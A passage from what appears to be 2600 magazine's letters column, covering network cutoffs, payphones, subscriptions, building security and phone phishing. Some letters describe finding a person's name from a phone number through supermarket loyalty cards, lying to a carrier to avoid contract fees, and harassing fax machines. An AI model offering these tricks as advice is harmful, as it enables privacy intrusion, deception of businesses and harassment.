The period for commenting on the whole HTH thing has expired. As for a “mentor,” this is not how you become a hacker. You have to go out and learn, read, experiment on your own. We’re not saying other people won’t be a big influence. But to have one person try and mold you into something isn’t the way to become an inquisitive and creative individual, which is what a hacker ultimately is. It may seem as if there is no inspiration around you, but that should make you even better at finding alternative ways of thinking and accomplishing things. Some of the best hackers come from the middle of nowhere.

Dear 2600: I have a straightforward question and keep in mind I am no computer whiz. I have been cut off of the network at work. In other words, I have no Internet access. It is my fault and so I’m not trying to get at anyone. I’m too old for that. But is the termination done at the server or my computer or both? OK, thanks 2600 and I appreciate all the great writers you have and their articles. Keep up the good work! John Badlands of West Texas

There are any number of ways you could be cut off, from physically unplugging your connection to disallowing your particular machine in a local switch or router to filtering all of your Internet traffic through software. The best way to determine what’s happening to you is to see what the response is when you try to connect to something. If there’s a lot of shouting and people start running towards you, then you can assume that your outbound traffic is being carefully scrutinized somewhere and that your actions are really being watched. If you can’t connect to the company’s internal network, your machine has been completely isolated. If you can connect to 2600.com but not to cnn.com, then your company is using blocking software (obviously misconfigured in this example) and it’s either being applied just to your machine, or possibly to everyone. If you run a “traceroute” from your local machine to a remote one at your command prompt (“tracert” in Windows), you should be able to see at what point you’re being terminated.

Dear 2600: I bought a payphone on eBay for cheap to use in my living room. I get many compliments from friends and visitors whenever they visit my house. They have never seen a payphone inside a house! My only problem is that I always have to deposit 35 cents whenever I want to make a call. I can receive calls just fine, but when I try to dial, it charges me. Does anyone at 2600 know how I can program my payphone to make calls without inserting money? It would mean the world to me. Manny

Clearly you didn’t buy a genuine Bell payphone of old that was once the only kind in existence, since those can be hooked up just fine in your home without ever asking for money. The reason for that is because all payphones used to have a different kind of line category assigned to them. This is why it was always such fun to hack into the phone company computer and switch someone’s class of service to that of a payphone. They would then be asked for money every time they made a phone call, even though they weren’t even using a payphone. But we digress. You have what is known as a “smart” payphone, where all of the technology is contained in the phone itself. You’d need to look up documentation on the specific model you have to see how you can disable the demands for cash. We hope you at least have the key to your phone so you can reclaim the money you’re inserting.

Dear 2600: I discovered a phone phreak method for jail phones when I was arrested back in 1999 for BASE jumping. It’s fairly simple. How do I submit an article? BASE 460

You can send articles to articles@2600.com (we assume you’ve served your time and have net access) or by writing to 2600 Articles, PO Box 99, Middle Island, NY 11953. You do realize that ten years have gone by and it’s quite likely there have been some changes, even to a decrepit prison phone system? Either way, we’d like to read what you have.

Dear 2600: What is the significance of the number 2600? Doug

It’s the name of our magazine. Next?

Dear 2600: I’m sure this has been asked, and you’ve likely answered - but what the hell... I’ll ask again. Have you given any thought to digital distribution for the quarterly zine? I tried Amazon’s Kindle application for the iPhone/iPod and I was very impressed. I thought the small screen size would be an annoyance, but it’s actually very convenient. I’d be willing to pay a price comparable to your regular issue price or subscription price. 2600 would probably have an advantage and ability to charge more than heavily circulated magazines are currently charging through devices like Kindle; the format would allow for a reader to have many back issues of 2600 at their disposal as a reference. I’m sure it would allow some readers to avoid the retail hassles (can’t find it on the magazine rack) and help you prevent the printing and distribution headaches you inform us of from time to time. I do see that The Best of 2600: A Hacker Odyssey is available in the Kindle store. Good move. The hardcopy edition is pretty damn thick! For readers with a Kindle, iPhone, or iPod touch with the free Kindle reader app installed that haven’t picked up a copy, I’d recommend giving it a try in the digital format - it’s convenient and you save a few bucks at the same time. sonnik

252

We’re looking into this and so far Amazon has been the only obstacle to our moving ahead. We hope to be able to report some progress in the near future.

Dear 2600: I was looking at the store and noticed I could buy the complete set of back issues and a lifetime subscription in the same lot. I have a few questions about this. Approximately how big will the package containing the back issues be (and how heavy)? Also, is it possible to get the back issues delivered to a different address than the subscription? I would prefer to get the back issues at work so I won’t have to pick them up from the post office but would want the magazine delivered to my home address the rest of the time. It says it also comes with two shirts and a hat. What two shirts are they? Are they the same? Also, is there someone with the sizes and measurements? I don’t want to say my normal size and find out you guys make them to different measurements. Thanks in advance.
Wendell

We generally send lifers the two most recent t-shirts. We don’t send two of the same. That would be a dickish move. As for sizes, sure... you can call our office and see if someone can read you the specifics off the label but generally our sizes are pretty standard for American shirts. The package will likely be two packages and they are definitely carryable but not all that light. Figure around 20 pounds. Your other questions need to be answered through our order department (orders@2600.com) or by calling +1.631.751.2600.

Dear 2600: I’ve been a long time reader of 2600 and enjoy it greatly. I buy every issue of 2600 (instead of subscribing) as I believe that it is equally important to see the magazine displayed on magazine shelves! It is important that the general public gets a chance to discover your magazine while browsing newsstands or bookstores, which is why I buy it and contribute to its demand in stores. I even go to the extent of buying from different places. It would be a bummer if everyone subscribed and no one bought from stores! What do you think? FYI, I live in Santa Monica (California) and the owner of the newsstand on the “promenade” (very high traffic) tried several times to contact you in order to get your mag on his shelves.
Guillaume

Generally, we use distributors to send to individual stores so we don’t get overwhelmed. We do make exceptions if the order is bigger than normal. This is likely what we told him if he inquired about this. We can definitely pursue this if he’s still interested. Thanks for helping to support us.

Observations

Dear 2600: At my local Safeway, you are allowed to type in your phone number if you forget your “Safeway Club Card.” When you do this (if you have a Safeway Club Card), your name appears on the receipt. For years, I have been using a Chinese friend’s phone number because I think it is funny when the cashier says, “Thank you for shopping at Safeway, Mr. Wong,” when I am so obviously African-American. The cashiers often bulge their eyes with surprise and I laugh even harder, but it goes farther than that. Obviously, this is a very simple method for finding out the name of whoever owns a certain phone number (if they have a Safeway card connected to it). If not, you can always try any other major supermarket. Almost everyone has to shop and, because these cards give the user discounts, the chances are high that almost every person will have a card in at least one supermarket. The only way around this vulnerability is to insist that the customer have their actual card or club number, which the supermarkets will never do because of inconvenience, or to give each cashier an anonymous “guest” club card to use in these cases (I’m not sure why they don’t do this, but a cashier told me they weren’t allowed). If this has already been pointed out by someone in 2600, I missed it.
Barrett D. Brown

Dear 2600: From New York City with love. I consider myself a modern hacker. Although not an engineer or programmer, I hack information to keep others and myself honest and fulfill my goals. I have a few experiences to share. Two G**gle related experiences I’ve had this year related to security and privacy: 1) Earlier this year I worked with someone who did a “Tech Talk” at the G**gleplex in Manhattan. After the building’s entrance, there is a checkpoint with two security personnel at a desk. My ID was not checked after telling them I was there to meet so-and-so. Once you get past this, the elevator was distant from the welcome desk (about 30 feet?), and after getting into an elevator and getting off at the appropriate floor, the employee workstations, cafeterias, library, lego faces of the CEOs, etc., everything is there. No one greeted me, and I could enter through their see-through locked doors beyond the “lobby” because employees coming out would just hold the door open for me. A simple trick. It’s very lax. Though I would imagine that upon entering multiple times, one would not be met with the same circumstances. 2) I recently went through Gmail’s process of creating a new email account, and they are now asking for mobile numbers. This was not the case when I first signed up (when it debuted). I explored a little more and found “One

of the reasons we’re offering this new way to sign up for Gmail is to help protect our users and combat abuse.” It seems like this might have more to do with halting people from having an excess number of accounts. I’m not sure how giving away one’s mobile phone number “protects” users.
reconfigure

Regarding your first story, is it really such a big deal that you were able to get into a building or even an office without draconian security checks? Have we programmed ourselves so thoroughly that we think something is amiss when we’re not overly scrutinized? Walking into an office building used to be a fairly trivial event. There’s no reason why it can’t be again. Google claims they’re protecting users from receiving spam by limiting the number of accounts that can be created on their service. By forcing people to receive and respond to a message on their mobile phone, they obviously make it more difficult to create a whole bunch of accounts quickly. In addition, they can limit the number of accounts that are created for each phone number. This is probably a good thing. But these aren’t methods of protecting their users from receiving spam, they’re methods of protecting the entire Internet from receiving spam from their users.

Dear 2600: Sorry if I’m sending this to the wrong email, but I remember there being a problem with the bookstores not selling 2600 correctly and you guys not getting credit for it. Well, I just picked up my winter issue, and at the register it wouldn’t scan, despite the lady trying at least ten times. She ended up just putting it down as some generic periodical. I went back to the store to exchange it, but all the magazines on the shelf were the same way. So they pulled them all off. Also, maybe coincidence or maybe the machine was messed up, but the same thing happened for my hakin9 magazine. I don’t know if this applies to all the magazines distributed or not, though. Just hoping you guys don’t get stiffed. It was a Borders over in Jensen Beach, Florida.
Nunook

We would have gotten stiffed had this happened in a Barnes and Noble. Their policy holds publishers responsible for any issues that aren’t accounted for in their stores.

Dear 2600: I bought a copy of the latest 2600 Magazine and the pages started on page 11 then, after page 18, it started on page 11 again. Pages 1 through 10 were missing as well as the last ten pages. So, I was hoping you might be able to send me the missing pages in an email or post them on the web.
Rob

This kind of thing happens every now and then. If you see an example of this, let us know exactly where you saw it and, if possible, send us a copy of the defective issue. This helps greatly in keeping future imperfections to a minimum.

Dear 2600: I recently saw a movie from 1983 called Brainstorm with Christopher Walken. For that time period, I think it was ahead of its time. In some ways, it could be on the same shelf as Blade Runner (1982), Videodrome (1983), and WarGames (1983). For 2600 readers not aware of it, it might be of interest.
Reader in Brooklyn, NY

Dear 2600: A friend and I were discussing War and Peace. I wondered how many megs it would take up on a hard disk, so I did a quick search for it. Does this mean something or is it just a coincidence that its ID in Gutenberg’s systems is 2600? http://www.gutenberg.org/etext/2600
Ankylosaurus

Either way, we’re in pretty good company.

Dear 2600: I like to call fax machines with Skype. It causes the machine to ring and make noises at the other end. And last, using Skype’s dial pad, you can cause untold amounts of noise for the receiver constantly. lol.
blackoperations

Whatever gets you through the day.

Dear 2600: Continuing the conversation and in response to dmchale, an experience I had entering the building that houses the Department of Labor in Brooklyn, New York. There is one checkpoint there that is similar to an airport. I had a backpack on with a shirt, pants, papers, and a banana inside of it. On top of that, I had a wallet with a small zipper pouch. I had a multi-tool in there with a flat foldable blade that also has a screwdriver and bottle opener. The blade went undetected, but since their policy says no food allowed inside, they would not let me through with the evil banana. I asked three different officers standing around about the no food policy, and not one of them could tell me any reason why this was the policy. All they said was that they follow orders! They couldn’t even tell me if it was for the simple reason of lessening garbage. Crazy but true.

Dear 2600: I recently had to cancel a cell phone plan for my boss so he could switch from Sprint to AT&T. I did some research to see how I could social engineer a way around the canceling-contract fee. I came across a way to do it. All that you need to know is service areas. I needed to find an area in the U.S. where there is no Sprint service. Then, like a good employee, all I had to do was go into Sprint and tell them that my boss was moving to one of those areas and I needed to find a store around the area. They then insisted that there were not any and that his best bet was to switch services. After a little more manipulation/playing dumb, they canceled the contract for free and told me what service provider would

best suit him. The reason being is AT&T (like other companies) loses money from people in those areas because they have to use other service providers’ towers which, of course, is not free. Side note: I know an office employee for AT&T and her job is to call customers who live in areas where they are constantly roaming, and tell them they have X amount of days to find a new provider and let them know what the major local provider is. Anyway, hope this helps someone in need, in a money hungry society.
TheC0A7S

Another method that has been known to work is to enlist in the military and be sent somewhere far away where your cell phone won’t work. It’s a bit of an extreme way of getting out of a cell phone contract, but we live in desperate times.

Dear 2600: My cell phone rang but I was busy and let it go to voice mail. No message left. Later that evening, another call came in and I answered it. We spoke and I asked what the reason for the call was. She didn’t know. Three more calls came in from the same number later that day. Again I was busy and no message was left. I didn’t recognize the number, but dialed it anyway since I’m a business owner and it might be a customer. The automated response on the line identified the number as Citibank. A recorded message said that I had a balance on my business card and that it was past due with penalty charges. I kept pressing zero until I was connected to an operator. The operator confirmed that I had a balance and listed off the charges, all of which were from a supplier that I use. I offered to pay off the balance. The operator asked me for my bank routing and account numbers. At this point I balked and realized that I didn’t really know who I was speaking to. I had already given my account information, address, secret password, and Social Security number to someone who could be just masquerading as being from Citibank. Thinking something was amiss, I stopped short and told the operator that I would call back to the number printed on the back of my Citicard. She pressed for bank info, but finally gave up and gave me a case number. Calling back, I hit zero to speak with an operator. It took three more calls and over two hours to finally settle the problem. I asked about my previous call and the operator could see a record of it. Turns out that the business card side of Citibank doesn’t talk to the personal card side. The operator I had previously spoken with only looked at my personal cards, checked my credit cards, one current and one long since expired, and assured me that both were current and had a zero balance. I fully realized the separation between the personal and business card sides at Citibank. I asked why I hadn’t received a statement from Citi and the operator replied that I had been switched to paperless billing. I asked what email address they sent the statement to and she replied that that field was blank. In other words, there was no way they could send me a statement. I closed that account since I didn’t want to deal with a company that switches you to paperless billing without a way to get you the statement. By then my meatloaf was overcooked and I was absolutely frustrated. I got to thinking that phishing by phone is more than probable. Being responsible, I am security conscious, never clicking on links from banking emails, but still gave my info readily to someone on the phone. In the future, I dial a known number before releasing info by phone.
The Webist

Switching to paperless billing saves the credit card companies a fortune but it often provides a real disservice to the consumer who can easily miss bills and be tricked into paying late fees. And tricking customers into not getting a paper bill is a sure way of making paperless bills unappealing. In addition, many companies don’t store past bills for very long, which can be extremely inconvenient for someone who needs to look something up. We suggest a compromise for all of those credit card companies who care so much about the environment. Just send us the bill without all the junk and special offers you cram into the envelope. That will save postage, trees, and aggravation.

Dear 2600: For reasons that still escape me, my girlfriend reads Cosmopolitan. In the November 2009 issue, there was an article about Kim Kardashian that was pointed out to me, and in it there was something that might be of interest to the hacker community. On page 44, there was a section called “935 Things You Didn’t Know About Kim... Until Now.” Number One reads as follows: “She claims to be an amateur hacker who can break into anyone’s voice mail or email.” Wow. I never knew she was so 31337. The only hacking I thought she did was her acting.
Michael J. Ferris

Super hackers reside in the most unusual places. Who’s to say a super celebrity can’t also have this ability? Perhaps she will accept our invitation to speak at The Next HOPE on her methods. Or maybe you’ll read about them in a future “Hacker Perspective.” The important thing is that none of us anger her because we really don’t know what she’s capable of.

Requests

Dear 2600: Would love to get a 2600 subscription on

my Amazon Kindle. Would think it would be doable since the book is available there.
Lyle

One would think. We’re still working on Amazon.

Dear 2600: I need help catching a hacker that seems to be able to fool everyone. He has cost me thousands of dollars and made my life hell for ten months. Investigators have given up and I am not. Do you know of anyone who can help? Is there a way I can contact you? I am writing you from a Kinko’s in Los Angeles.

It’s very easy to make people believe that someone is capable of tapping any phone or reading any email. All that’s required is a bit of fear and little to no understanding of how the technology works. We can’t tell you the number of times someone has suspected us of being up to something, simply because their phone rang after they called us or they got a piece of spam right after sending us an email. In nearly half of those cases, it’s not even that. If people want to believe someone is after them, they will, regardless of what the person is actually doing. But in the vast majority of cases, your lights flickering or your phone buzzing or just your “knowing” that someone is up to something isn’t going to work on anyone who doesn’t share a psychic link with you. So the best thing to do is remain calm and wait for solid evidence. Even then, don’t fixate on this because that’s the surest way to have someone completely destroy you. Note that there are plenty of bad investigators out there, of course. But if you’re not able to get satisfaction anywhere, you might want to consider the possibility that you’re wrong.

Grammar and Spelling

Dear 2600: As a long time reader but first time letterwriter, 2600 should not have conceded the point as quickly as it did: “And yes, you are completely right on the grammar.” Granny fails to parse the text she is “correcting.” Her (or his) analysis of the grammar of the sentence fragment in question is unreasonable, but I don’t have the context for the sentence fragment, being from the Summer 2008 issue, where you [2600] write, ‘Are you one of those people who read 2600...’ The subject of the sentence is ‘one’ and that means the verb (read) should be singular (reads). ‘of those people,’ and does not relate to the verb. The big mistake Granny makes is failing to identify that a dependent (noun) clause is the object of the preposition “of,” not just the solitary noun “people,” a plural noun, so “people” is not separate at all (as Granny believed). The sentence fragment could be rewritten as so, without any significant changes in grammatical structure: “You are one [person] of the [many] people who read 2600.” All I did was change wording from that of a question to that of a statement, and then I added a few implied words in brackets. As you can see, “people” can indeed be dealt with independent of “reads.” What was written remains grammatical, even out of context: “There are many people who read 2600. Are you one of them?” If, as Granny suggested, “read” were instead “reads,” the sentence would require “those people” to have an antecedent, because “who read” could no longer be modifying that noun. It is possible that this antecedent exists, for instance: “Some people have blue hair. Are you one (of those people) who reads 2600?” In this fictional case, the fiction can be rewritten without the prepositional phrase, as it refers to people who have blue hair: “Some people have blue hair. Are you one who reads 2600?” These two sentences are grammatically “correct,” if a bit disjointed. With the singular “reads,” the construction of the latter sentence is pretty archaic. To believe that, I would have to assume the original author didn’t mean what he wrote. Even if there were such a thing as “correct grammar,” the original writing would be perfectly fine.

And just when we thought we had dodged a bullet on that one.

it should have 2 l’s.

and is an expert in telephony